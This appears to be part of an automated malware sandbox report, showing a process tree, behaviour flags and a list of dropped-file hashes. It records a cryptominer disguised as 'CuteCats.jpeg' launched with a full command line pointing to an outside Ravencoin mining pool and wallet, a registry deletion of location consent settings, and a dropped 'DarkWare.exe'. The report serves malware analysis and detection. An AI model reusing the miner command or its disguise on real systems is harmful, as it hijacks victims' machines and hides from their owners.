C:\Windows\system32\cmd.exe/c REG DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\NonPackaged /f >nul4⤵PID:864
-
C:\Windows\system32\reg.exeREG DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\NonPackaged /f5⤵PID:4944
-
-
-
C:\ProgramData\CuteCats.jpegC:\ProgramData\CuteCats.jpeg -a kawpow -i 20 -o stratum+tcp://rvn.2miners.com:6060 -u RPUFwA26gSfphDcuv9hFe2LFLJxZcQzm8D.adraf -p x --api-bind-http 04⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2392
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DarkWare.exe"C:\Users\Admin\AppData\Local\Temp\DarkWare.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
38.3MB
MD540532ea36c2d4de56522ecf707bf289e
SHA186520c67e37b43366f965b63ba78070688bff83e
SHA25608e994aa4659a0fd4674d93ed9e683dff7c020013629e39d6ea73091f2bcd33b
SHA51241df9cc910afe6ffe7f92e1e26b607cf7fea18f52a746ca97d532406401035b5bb3ac5ebcb9bc659d4125cbf7262383aefc1f03a01886dc71e268b52ac2b43ce
-
Filesize
1KB
MD57fb5fa1534dcf77f2125b2403b30a0ee
SHA1365d96812a69ac0a4611ea4b70a3f306576cc3ea
SHA25633a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f
SHA512a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD52c0d8dc8d04bcc72ab0d153760457ba6
SHA12b5ef3e676790bb508b13f2b0f7956a80d782e90
SHA256ebe5bb8542784433f3b7085f9b42d63823bc254af32352f2d198ef2b683e0b1a
SHA512605e050a98826267071f286f8a4c5547e56d788ef2a8ad890f1fc028f75e2b1cb22b28b419c3f6854774bb776aa9812b9be86289faec16c96b996b22ff9af922
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD572313da562f413a197d6ddcbc7513a36
SHA12486f30bc2bae44ee0e2cf46375de772adabdca1
SHA256dc527a22308393fcf1c2299a6843e1a95706cb2a84539830e84e1f6a91177b10
SHA512edbfe959115c467904525a7cedec8793557e4f40ac80f468aec567ec572c76e6b82acbc1779aeaa4e79679f01a026f4cf59b751d0a28899bbe950d1e1cf4f38f
-
Filesize
120B
MD52a5c3c98c3398680dd3e4caaf4283721
SHA13a3a80594c3001c51769f92bdd9e9bc71474f1bb
SHA256054e4c4699aef7aae33a8fe1c758c75d7a351ffa9f6184e59093031bebf67e70
SHA5125722337a6128d60b8110f6e5ee6618453eae3ad54320bf27dc43a6ca333c0d8333df027647a588f8fa890cb6ec7e0921b2597216ea48c593c2c6c2008603d786
-
Filesize
165B
MD562eeab4649e7264566b80abe1d78bd76
SHA1ef0ec2059e91fa3878886ed5c9f0b501f12053c4
SHA256362ee6369ff6d0fb99ce17fac9e3082032ec2aefdb71cd510905552d5b9289ae
SHA512a8910e8d0761acb067b77b41c73a569282bc889c0ee8ca9b773e42038a0a3b7192e534f1578db21c7f21abcd70e68a42c494905ce099c4df6e6afca5763dd687
-
Filesize
217B
MD57b27754f38364499d2e3ca7545e595dd
SHA1fda34f6a52c365cc923c24efe91c1e5872fb35ca
SHA2564c9a72709d68a7a8de1c0671ef22b1418d738b593d6d4a2fec2db30858be9418
SHA51203e0c9807e62a462207eb7fdec44bb07b19c80753093777c99045c168f881feab4245bc874942bb7943a4219610e04e2a8a343b5922fdffaa68828d333670303
-
Filesize
163B
MD57f20048f8da6e42dfd6331bd96b8dd02
SHA190126e36609efec7cbeacae5dc8e001c71f14761
SHA2565dfd0b7798205499580908d5606fb0c9477ac5218549c3f8d4b5cefdebbd3ff8
SHA512adf540254f5d6b5c3881dfe2d4a801d9302adf8fbac2fbf2dfcc15542cb77ec311336c783b806631ad7f3d065e732889e0bf5dcd42eaff1c33de1c828f4d6cac
-
Filesize
138KB
MD56fe439b4f5cf20c00b987658efc382ab
SHA12828e90db93c67305bffaa2c073de74f04624bf8
SHA256463dd3b1a23e58e02389bc85d414c29a345e1f68ce083dcb97f9e969b99b3e81
SHA512c269f578b399921e5701c43a4f6ee25f23427e32782af4611f65ae42f4a823751ca8a296ccb383c17cc91c0d8d4975f5a85a4a368e8e424dfb2748051941befd
-
Filesize
125B
MD58b4ed5c47fdddbeba260ef11cfca88c6
SHA1868f11f8ed78ebe871f9da182d053f349834b017
SHA256170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5
SHA51287e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf
-
Filesize
1.9MB
MD52fe735b8323f0a8ad747737d3f3bc183
SHA14c42b0dc2fe774cb09eb1049897cb2f4205e318c
SHA2566d7a95d3cfd8acdf6e3fafbbe35130db3da4d7281918bce6eb226bc5488f91d5
SHA512022fac37dab002298231c9288c08ed13d812a1ac93c07064d386b539ac6141b39439dec676f70e3677fb89b6482f2ee475d19c67f90b634d5fa06e806f1fd17a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
230KB
MD5f08723bcb5c94651b8df18a3ad027460
SHA1e9f855543aab8f383a34d6a738889034daa6b5a3
SHA256b8ca9e14e7adaa62220329b33138336146a2b3188215fcbd38365efc2f756460
SHA5123f647c85345e08d533d15a3fab7394da3caff2b4fdbaaa83946321312f3f17d5cba018309d4b2206f083f9fd90f568c27399932c2ae5ae79200a05d6dd0da589